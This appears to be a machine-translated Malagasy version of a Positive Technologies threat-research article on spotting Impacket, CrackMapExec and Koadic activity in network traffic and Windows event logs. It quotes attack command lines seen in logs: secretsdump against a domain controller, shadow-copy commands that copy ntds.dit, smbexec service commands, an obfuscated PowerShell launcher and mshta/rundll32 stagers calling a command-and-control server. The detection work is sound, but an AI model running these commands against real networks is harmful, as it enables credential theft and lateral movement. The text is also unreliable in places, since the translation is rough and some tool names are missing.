Mitombo isan-taona ny isan'ny fanafihana eo amin'ny sehatry ny orinasa: ohatra amin'ny 2016, ary amin'ny faran'ny 2018 - noho ny tamin’ny vanim-potoana teo aloha. Anisan'izany ireo izay fitaovana miasa lehibe dia ny rafitra fiasan'ny Windows. Tamin'ny taona 2017-2018, ny APT Dragonfly, APT28, Nanao fanafihana ireo fikambanana governemanta sy miaramila tany Eoropa, Amerika Avaratra ary Arabia Saodita. Ary nampiasa fitaovana telo izahay tamin'izany - , и . Misokatra ny kaody loharanon-dry zareo ary hita ao amin'ny GitHub.
Marihina fa ireo fitaovana ireo dia tsy ampiasaina amin'ny fidirana voalohany, fa amin'ny famolavolana fanafihana ao anatin'ny fotodrafitrasa. Ny mpanafika dia mampiasa azy ireo amin'ny dingana samihafa amin'ny fanafihana manaraka ny fidiran'ny perimeter. Izany, raha ny marina, dia sarotra ny mamantatra ary matetika noho ny fanampian'ny teknolojia na fitaovana mamela . Ny fitaovana dia manome asa isan-karazany, manomboka amin'ny famindrana rakitra mankany amin'ny fifandraisana amin'ny rejisitra sy ny fanatanterahana baiko amin'ny milina lavitra. Nanao fanadihadiana momba ireo fitaovana ireo izahay mba hamaritana ny asan'ny tambajotra.
Inona no tokony hataontsika:
- Fantaro ny fomba fiasan'ny fitaovana hacking. Fantaro hoe inona no ilain'ny mpanafika hitrandraka ary inona no teknolojia azony ampiasaina.
- Mitadiava izay tsy hitan'ny fitaovana fiarovana ny vaovao amin'ny dingana voalohany amin'ny fanafihana. Ny dingana fitsikilovana dia mety ho tsinontsinona, na noho ny mpanafika dia mpanafika anatiny, na noho ny fanararaotan'ny mpanafika ny lavaka amin'ny fotodrafitrasa izay tsy fantatra teo aloha. Lasa azo atao ny mamerina ny rojo rehetra amin'ny asany, noho izany ny faniriana hamantatra hetsika bebe kokoa.
- Esory ny fanenjehana diso amin'ny fitaovana fitsirihana ny fidirana. Tsy tokony hohadinointsika fa rehefa tsikaritra amin'ny alàlan'ny fitsirihana fotsiny ny hetsika sasany, dia mety hisy ny fahadisoana matetika. Matetika ao amin'ny fotodrafitrasa dia misy fomba maro, tsy azo avahana amin'ny ara-dalàna raha vao jerena, hahazoana vaovao.
Inona no omen'ireo fitaovana ireo ny mpanafika? Raha Impacket ity, dia mahazo tranomboky môdely lehibe azo ampiasaina amin'ny dingana samihafa amin'ny fanafihana manaraka aorian'ny fandravana ny perimeter ny mpanafika. Fitaovana maro no mampiasa ny maody Impacket anatiny - ohatra, Metasploit. Izy io dia manana dcomexec sy wmiexec ho an'ny famonoana baiko lavitra, secretsdump hahazoana kaonty avy amin'ny fitadidiana izay ampiana avy amin'ny Impacket. Vokatr'izany, ny fisavana marina ny asan'ny tranomboky toy izany dia hiantoka ny fahitana ny derivatives.
Tsy kisendrasendra ny nanoratan'ny mpamorona ny “Powered by Impacket” momba ny CrackMapExec (na CME tsotra fotsiny). Ho fanampin'izany, ny CME dia manana fiasa efa vita ho an'ny sehatra malaza: Mimikatz amin'ny fahazoana tenimiafina na hash, fampiharana ny Meterpreter na Empire agent ho an'ny famonoana lavitra, ary Bloodhound ao anaty sambo.
Ny fitaovana fahatelo nofidianay dia Koadic. Vao haingana izy io, naseho tamin'ny fihaonambe iraisam-pirenena hacker DEFCON 25 tamin'ny 2017 ary miavaka amin'ny fomba tsy manara-penitra: miasa amin'ny HTTP, Java Script ary Microsoft Visual Basic Script (VBS). Ity fomba fiasa ity dia antsoina hoe miaina ivelan'ny tany: mampiasa andiana fiankinan-doha sy tranomboky naorina ao amin'ny Windows ny fitaovana. Ny mpamorona dia miantso azy io hoe COM Command & Control, na C3.
IMPACKET
Ny fiasan'i Impacket dia tena midadasika, manomboka amin'ny fitsikilovana ao anatin'ny AD sy ny fanangonana angon-drakitra avy amin'ireo mpizara MS SQL anatiny, hatramin'ny teknika hahazoana mari-pankasitrahana: fanafihana fampitana SMB ity, ary ny fahazoana ny rakitra ntds.dit misy tenimiafina misy tenimiafina mpampiasa avy amin'ny mpanara-maso domaine. Impacket koa dia manatanteraka baiko avy lavitra amin'ny fampiasana fomba efatra samihafa: WMI, Windows Scheduler Management Service, DCOM, ary SMB, ary mitaky fahazoan-dàlana hanaovana izany.
Secretsdump
Andeha hojerentsika ny secretsdump. Ity dia môdely izay afaka mikendry ny milina mpampiasa sy ny fanaraha-maso ny sehatra. Azo ampiasaina izy io mba hahazoana dika mitovy amin'ny faritra fitadidiana LSA, SAM, SECURITY, NTDS.dit, mba ho hita amin'ny dingana samihafa amin'ny fanafihana. Ny dingana voalohany amin'ny fampandehanana ny maody dia ny fanamarinana amin'ny alàlan'ny SMB, izay mitaky na ny tenimiafina mpampiasa na ny teniny mba hanatanterahana ny fanafihana Pass the Hash. Manaraka izany dia tonga ny fangatahana hanokatra ny fidirana amin'ny Service Control Manager (SCM) ary mahazo fidirana amin'ny rejisitra amin'ny alàlan'ny protocol winreg, izay ahafahan'ny mpanafika mahita ny angon-drakitra momba ny sampana mahaliana ary mahazo valiny amin'ny SMB.
Ao amin'ny Fig. 1 dia hitantsika hoe ahoana marina ny fampiasana ny protocol winreg, ny fidirana dia azo amin'ny alàlan'ny fanalahidin'ny rejisitra miaraka amin'ny LSA. Mba hanaovana izany, ampiasao ny baiko DCERPC miaraka amin'ny opcode 15 - OpenKey.
vary. 1. Manokatra fanalahidin'ny rejisitra mampiasa ny protocol winreg
Manaraka, rehefa azo ny fidirana amin'ny fanalahidy, ny soatoavina dia voatahiry amin'ny baiko SaveKey miaraka amin'ny opcode 20. Impacket dia manao izany amin'ny fomba manokana. Izy io dia mitahiry ny soatoavina amin'ny rakitra iray izay misy tady misy tarehintsoratra kisendrasendra 8 miampy .tmp ny anarany. Fanampin'izany, ny fandefasana ity rakitra ity dia mitranga amin'ny alàlan'ny SMB avy amin'ny lahatahiry System32 (sary 2).
vary. 2. Tetika hahazoana fanalahidin'ny rejisitra avy amin'ny milina lavitra
Hita fa ny hetsika toy izany ao amin'ny tambajotra dia azo fantarina amin'ny alàlan'ny fanontaniana amin'ny sampana rejisitra sasany amin'ny alàlan'ny protocol winreg, anarana manokana, baiko ary ny baikony.
Ity module ity koa dia mamela soritra ao amin'ny diarin'ny hetsika Windows, izay mahatonga azy ho mora fantarina. Ohatra, vokatry ny fanatanterahana ny baiko
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCAo amin'ny Windows Server 2016 log dia ho hitantsika ireto filaharan'ny hetsika manaraka ireto:
1. 4624 - Logon lavitra.
2. 5145 - fanamarinana ny zo fidirana amin'ny serivisy lavitra winreg.
3. 5145 - manamarina ny zo fidirana amin'ny rakitra ao amin'ny lahatahiry System32. Ny rakitra dia manana ny anarana kisendrasendra voalaza etsy ambony.
4. 4688 - mamorona dingana cmd.exe izay manomboka vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - mamorona dingana miaraka amin'ny baiko:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - mamorona dingana miaraka amin'ny baiko:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - mamorona dingana miaraka amin'ny baiko:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Sahala amin'ireo fitaovana fanararaotana maro, Impacket dia manana maody ho an'ny fanatanterahana baiko lavitra. Hifantoka amin'ny smbexec isika, izay manome akorandriaka baiko mifampitohy amin'ny milina lavitra. Mitaky fanamarinana amin'ny alàlan'ny SMB ihany koa ity maody ity, na amin'ny tenimiafina na tenimiafina. Ao amin'ny Fig. Ao amin'ny sary 3 isika dia mahita ohatra iray amin'ny fomba fiasan'ny fitaovana toy izany, amin'ity tranga ity dia ny console mpitantana eo an-toerana.
vary. 3. Interactive smbexec console
Ny dingana voalohany amin'ny smbexec aorian'ny fanamarinana dia ny fanokafana ny SCM amin'ny baiko OpenSCManagerW (15). Misongadina ny fanontaniana: DUMMY ny saha MachineName.
vary. 4. Fangatahana hanokatra Service Control Manager
Avy eo, ny serivisy dia noforonina amin'ny alàlan'ny baiko CreateServiceW (12). Raha ny momba ny smbexec, dia afaka mahita lojika fananganana baiko mitovy isika isaky ny mandeha. Ao amin'ny Fig. Ny maitso 5 dia manondro mari-pamantarana baiko tsy azo ovaina, ny mavo dia manondro izay azon'ny mpanafika ovaina. Mora ny mahita fa azo ovaina ny anaran'ny rakitra executable, ny lahatahiry ary ny rakitra output, fa ny ambiny dia sarotra kokoa ny manova tsy manelingelina ny lojika amin'ny module Impacket.
vary. 5. Fangatahana hamorona serivisy mampiasa Service Control Manager
Smbexec koa dia mamela soritra miharihary ao amin'ny diarin'ny hetsika Windows. Ao amin'ny logiciel Windows Server 2016 ho an'ny shell command interactive miaraka amin'ny baiko ipconfig, dia ho hitantsika ireto filaharan'ny hetsika manaraka ireto:
1. 4697 - fametrahana ny serivisy amin'ny masinin'ny niharam-boina:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - famoronana ny dingana cmd.exe miaraka amin'ny tohan-kevitra avy amin'ny teboka 1.
3. 5145 - manamarina ny zo fidirana amin'ny rakitra __output ao amin'ny lahatahiry C$.
4. 4697 - fametrahana ny serivisy amin'ny masinin'ny niharam-boina.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - famoronana ny dingana cmd.exe miaraka amin'ny tohan-kevitra avy amin'ny teboka 4.
6. 5145 - manamarina ny zo fidirana amin'ny rakitra __output ao amin'ny lahatahiry C$.
Impacket no fototry ny fampivoarana fitaovana fanafihana. Saika manohana ny protocols rehetra ao amin'ny fotodrafitrasa Windows izy io ary manana ny endri-javatra mampiavaka azy manokana. Ireto misy fangatahana winreg manokana, ary ny fampiasana ny SCM API miaraka amin'ny fananganana baiko mampiavaka, ary ny endrika anaran-drakitra, ary ny SMB mizara SYSTEM32.
CRACKMAPEXEC
Ny fitaovan'ny CME dia natao voalohany indrindra mba hanamarihana ireo hetsika mahazatra izay tsy maintsy ataon'ny mpanafika mba handrosoana ao anatin'ny tambajotra. Mamela anao hiasa miaraka amin'ny mpandraharaha Empire sy Meterpreter fanta-daza. Mba hanatanterahana ny baiko mangingina, dia afaka manafina azy ireo ny CME. Amin'ny fampiasana Bloodhound (fitaovana fitsikilovana mitokana), ny mpanafika dia afaka manao automatique ny fitadiavana fivoriana mpitantana sehatra mavitrika.
bloodhound
Bloodhound, amin'ny maha-fitaovana tokana azy, dia mamela ny fanaraha-maso mandroso ao anatin'ny tambajotra. Manangona angona momba ny mpampiasa, milina, vondrona, session ary atolotra ho script PowerShell na rakitra binary. Ny protocols mifototra amin'ny LDAP na SMB dia ampiasaina hanangonana vaovao. Ny maody fampidirana CME dia ahafahan'ny Bloodhound alaina any amin'ny masinin'ny niharam-boina, mihazakazaka sy mandray ny angon-drakitra voaangona aorian'ny famonoana, ka mahatonga ny hetsika ho azy ao amin'ny rafitra ary mahatonga azy ireo ho tsy dia mibaribary loatra. Ny akorandriaka sary Bloodhound dia manolotra ny angon-drakitra voaangona amin'ny endrika grafika, izay ahafahanao mahita ny lalana fohy indrindra avy amin'ny milina mpanafika mankany amin'ny mpitantana ny sehatra.
vary. 6. Interface Bloodhound
Mba hampandehanana amin'ny masinin'ilay niharam-boina dia mamorona asa amin'ny ATSVC sy SMB ny maody. ATSVC dia interface tsara ho an'ny miasa miaraka amin'ny Windows Task Scheduler. CME dia mampiasa ny fiasany NetrJobAdd(1) mba hamoronana asa amin'ny tambajotra. Ohatra iray amin'izay alefan'ny module CME dia aseho amin'ny sary. 7: Ity dia fiantsoana baiko cmd.exe sy kaody obfuscated amin'ny endrika tohan-kevitra amin'ny endrika XML.
Fig.7. Mamorona asa amin'ny CME
Rehefa avy natolotra ny famonoana ny asa, dia manomboka ny Bloodhound ny masinin'ilay niharam-boina, ary hita eo amin'ny fifamoivoizana izany. Ny maodely dia miavaka amin'ny fangatahana LDAP hahazoana vondrona manara-penitra, lisitry ny milina sy mpampiasa rehetra ao amin'ny sehatra, ary hahazoana fampahalalana momba ny fotoam-piasan'ny mpampiasa mavitrika amin'ny alàlan'ny fangatahana SRVSVC NetSessEnum.
vary. 8. Mahazoa lisitry ny fivoriana mavitrika amin'ny alàlan'ny SMB
Ho fanampin'izay, ny fandefasana Bloodhound amin'ny masinin'ny niharam-boina miaraka amin'ny fanaraha-maso dia miaraka amin'ny hetsika miaraka amin'ny ID 4688 (famoronana dingana) sy ny anaran'ny dingana. «C:WindowsSystem32cmd.exe». Ny tena mampiavaka azy dia ny arguments command line:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Ny module enum_avproducts dia tena mahaliana amin'ny fomba fijery ny fiasa sy ny fampiharana. Ny WMI dia mamela anao hampiasa ny fiteny fangatahana WQL haka angona avy amin'ny zavatra Windows isan-karazany, izay tena ampiasain'ity maody CME ity. Izy io dia miteraka fanontaniana amin'ny kilasy AntiSpywareProduct sy AntiМirusProduct momba ny fitaovana fiarovana napetraka amin'ny masinin'ilay niharam-boina. Mba hahazoana ny angon-drakitra ilaina, ny maody dia mifandray amin'ny rootSecurityCenter2 namespace, avy eo dia miteraka fanontaniana WQL ary mahazo valiny. Ao amin'ny Fig. Ny sary 9 dia mampiseho ny votoatin'ny fangatahana sy valiny toy izany. Ao amin'ny ohatra ataontsika dia hita ny Windows Defender.
vary. 9. Hetsika tambajotra amin'ny module enum_avproducts
Matetika, ny fanaraha-maso WMI (Trace WMI-Activity), izay ahitanao fampahalalana mahasoa momba ny fangatahana WQL amin'ny hetsika, dia mety ho kilemaina. Fa raha alefa izany, dia raha mandeha ny script enum_avproducts, dia ho voatahiry ny hetsika misy ID 11. Ahitana ny anaran'ny mpampiasa nandefa ny fangatahana sy ny anarana ao amin'ny rootSecurityCenter2 namespace.
Ny maody CME tsirairay dia samy nanana ny zava-bitany manokana, na fanontaniana WQL manokana na famoronana karazana asa iray ao amin'ny mpandrindra asa miaraka amin'ny obfuscation sy hetsika manokana momba ny Bloodhound ao amin'ny LDAP sy SMB.
KOADIC
Ny endri-javatra miavaka amin'ny Koadic dia ny fampiasana mpandika teny JavaScript sy VBScript ao amin'ny Windows. Amin'io lafiny io, manaraka ny fironan'ny tany izy io - izany hoe tsy misy fiankinan-doha ivelany ary mampiasa fitaovana Windows mahazatra. Fitaovana feno Command & Control (CnC) ity, satria aorian'ny otrikaretina dia misy "implant" napetraka eo amin'ny milina, mamela azy hifehy azy. Ny milina toy izany, amin'ny teny Koadic, dia antsoina hoe "zombie". Raha toa ka tsy ampy ny tombontsoa ho an'ny fampandehanana tanteraka eo amin'ny sisin'ilay niharam-boina, i Koadic dia afaka manangana azy ireo amin'ny alàlan'ny teknikan'ny User Account Control bypass (UAC bypass).
vary. 10. Koadic Shell
Ny niharam-boina dia tsy maintsy manomboka mifandray amin'ny mpizara Command & Control. Mba hanaovana izany dia mila mifandray amin'ny URI efa nomanina teo aloha izy ary mandray ny vatana Koadic lehibe amin'ny fampiasana ny iray amin'ireo stagers. Ao amin'ny Fig. Ny sary 11 dia mampiseho ohatra ho an'ny stager mshta.
vary. 11. Fanombohana fivoriana miaraka amin'ny mpizara CnC
Miorina amin'ny WS variable valinteny, dia lasa mazava fa ny famonoana dia mitranga amin'ny alalan'ny WScript.Shell, ary ny variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE dia ahitana fampahalalana manan-danja momba ny mason'ny fivoriana ankehitriny. Ity no mpivady mamaly fangatahana voalohany amin'ny fifandraisana HTTP miaraka amin'ny mpizara CnC. Ny fangatahana manaraka dia mifandray mivantana amin'ny fiasan'ny antsoina hoe modules (implants). Ny maody Koadic rehetra dia tsy miasa afa-tsy amin'ny fivoriana mavitrika miaraka amin'ny CnC.
Mimikatz
Tahaka ny CME miasa miaraka amin'ny Bloodhound, Koadic dia miara-miasa amin'i Mimikatz ho programa misaraka ary manana fomba maro hanombohana azy. Ity ambany ity ny mpivady fangatahana-valiny amin'ny fampidinana ny implant Mimikatz.
vary. 12. Mamindra an'i Mimikatz any Koadic
Azonao jerena ny fiovan'ny endrika URI amin'ny fangatahana. Izy io dia misy sanda ho an'ny variable csrf, izay tompon'andraikitra amin'ny module voafantina. Aza mihaino ny anarany; Fantatsika rehetra fa ny CSRF dia matetika takatra amin'ny fomba hafa. Ny valin'izany dia ny vondron'ny Koadic ihany, izay nampiana kaody mifandraika amin'ny Mimikatz. Tena lehibe izy io, ka andeha hojerentsika ny hevi-dehibe. Eto isika dia manana ny tranomboky Mimikatz voarakitra ao amin'ny base64, kilasy .NET serialised izay hanindrona azy, ary hevitra hanombohana ny Mimikatz. Ampitaina amin'ny tambajotra amin'ny lahatsoratra mazava ny valin'ny famonoana.
vary. 13. Vokatry ny fampandehanana ny Mimikatz amin'ny milina lavitra
Exec_cmd
Koadic koa dia manana mody afaka manatanteraka baiko avy lavitra. Eto isika dia hahita ny fomba famokarana URI mitovy sy ny fari-piadidiana mahazatra sy csrf. Raha ny mody exec_cmd, dia ampiana kaody amin'ny vatana izay afaka manatanteraka baiko shell. Ity ambany ity dia aseho ny kaody toy izany ao amin'ny valin'ny HTTP an'ny mpizara CnC.
vary. 14. Ampidiro ny code exec_cmd
Ny fari-piadidiana GAWTUUGCFI miaraka amin'ny toetra WS mahazatra dia ilaina amin'ny famonoana kaody. Miaraka amin'ny fanampiany, ny implant dia miantso ny akorandriaka, manodina sampana roa amin'ny code - shell.exec miaraka amin'ny fiverenan'ny stream data output sy shell.run tsy miverina.
Tsy fitaovana mahazatra ny Koadic, fa manana ny zava-bitany izay ahitana azy amin'ny fifamoivoizana ara-dalàna:
- fananganana manokana ny fangatahana HTTP,
- mampiasa winHttpRequests API,
- mamorona zavatra WScript.Shell amin'ny ActiveXObject,
- vatana lehibe azo tanterahina.
Ny fifandraisana voalohany dia natomboky ny stager, noho izany dia azo atao ny mamantatra ny asany amin'ny alàlan'ny hetsika Windows. Ho an'ny mshta, ity dia hetsika 4688, izay manondro ny famoronana dingana miaraka amin'ny toetra fanombohana:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Raha mandeha i Koadic, dia afaka mahita hetsika 4688 hafa ianao miaraka amin'ny toetra mampiavaka azy:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1hitany
Lasa malaza amin’ny jiolahy ny fivelomana an-tanety. Mampiasa ny fitaovana sy ny mekanika natsangana tao amin'ny Windows izy ireo ho an'ny filany. Hitanay ny fitaovana malaza Koadic, CrackMapExec ary Impacket manaraka ity fitsipika ity izay mihamitombo hatrany amin'ny tatitra APT. Mitombo ihany koa ny isan'ny forks amin'ny GitHub ho an'ireo fitaovana ireo, ary misy vaovao mipoitra (efa eo amin'ny arivo eo ho eo izao). Miha-malaza ny fironana noho ny fahatsorany: tsy mila fitaovana avy amin'ny antoko fahatelo ny mpanafika; efa eo amin'ny masinin'ireo niharam-boina izy ireo ary manampy azy ireo handalo ny fepetra fiarovana. Mifantoka amin'ny fandalinana ny fifandraisana amin'ny tambajotra izahay: ny fitaovana tsirairay voalaza etsy ambony dia mamela ny soritry ny fifamoivoizana amin'ny tambajotra; Ny fandalinana amin'ny antsipiriany momba azy ireo dia namela anay hampianatra ny vokatray hamantatra azy ireo, izay manampy amin'ny fanadihadihana ny rojom-pifandraisana an-tserasera rehetra misy azy ireo.
mpanoratra:
- Anton Tyurin, Lehiben'ny Departemantan'ny serivisy manam-pahaizana, PT Expert Security Center, Positive Technologies
- Egor Podmokov, manam-pahaizana, PT Expert Security Center, Positive Technologies
Source: www.habr.com